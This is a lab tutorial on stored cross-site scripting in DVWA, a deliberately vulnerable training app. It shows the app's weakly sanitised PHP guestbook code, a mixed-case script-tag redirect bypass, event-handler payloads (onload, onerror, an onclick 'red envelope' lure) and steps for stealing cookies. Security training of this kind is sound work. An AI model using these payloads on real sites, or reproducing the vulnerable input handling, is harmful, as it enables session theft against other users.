DVWA's XSS cross-site scripting attack (storage type)
table of Contents
Principle block diagram
Redirect pop-up to
get cookies
low class
1. Popup
Insert the xss code:
return to the xss page:
other people visit the page and trigger xss:
2. Redirect
Insert malicious code:
Return to the xss page and trigger a redirect:
Other people visit the page and trigger xss:
3. Get the cookie
Insert xss code:
use kali linux to monitor:
Other people visit the page and trigger xss:
get cookie:
Intermediate
View the source code of the page:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
It is found that the message materializes the html tag, and the name filters the <script> tag.
1. Popup
Change the label, copy, and bypass the mixed case.
2. Redirect
js code:
<scRipT>window.location = "http://www.4399.com"</script>
Insert code:
Other people visit this page:
3. Get the cookie
Similar to low level, pay attention to filtering bypass.
High level
View the source code: The
message html tag is materialized, and the name is regularly filtered by <script >; this tag cannot be used.
use:
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>点我领红包</a>
The third one is used here.
xss page:
other people visit and "receive red envelopes":
DVWA's XSS cross-site scripting attack (DOM type) .